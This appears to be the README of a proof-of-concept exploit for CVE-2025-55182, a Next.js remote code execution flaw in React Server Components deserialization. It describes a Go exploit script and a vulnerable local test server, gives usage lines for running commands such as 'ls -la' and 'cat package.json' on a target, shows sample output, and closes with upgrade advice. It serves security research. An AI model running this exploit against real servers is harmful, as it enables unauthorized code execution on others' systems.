
Proof-of-concept exploit for CVE-2025-55182, a Next.js RCE vulnerability via insecure deserialization in RSC requests. Includes a Go-based POC script and a vulnerable test server for security research and education.
⚠️ This tool is for security research and educational purposes only. Do not use it for illegal activities. ⚠️
CVE-2025-55182 is a critical remote code execution (RCE) vulnerability in the Next.js framework. This vulnerability originates from an unsafe deserialization issue when Next.js processes React Server Components (RSC) requests. Attackers can execute arbitrary code on the server without authorization by crafting malicious HTTP requests.
Affected Versions:
This project provides a vulnerable Next.js test server test-server.
Ensure you have Node.js and npm installed.
cd test-server
npm install
npm run dev
The server runs by default at http://localhost:3000.
Note: If you encounter lock file errors, try running:
rm -f .next/dev/lock && npm run dev
This project provides a Go language POC script poc.go.
Usage:
go run poc.go [target URL] [command to execute]
Examples:
Execute the id command (default)
go run poc.go
Or
go run poc.go http://localhost:3000 id
List files in the current directory
go run poc.go http://localhost:3000 "ls -la"
View file contents
go run poc.go http://localhost:3000 "cat package.json"
Expected Output:
Although the HTTP status code returns 500, the command execution result will be included in the digest field of the response.
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}
Upgrade Next.js to a safe version:
npm install next@latest react@latest react-dom@latest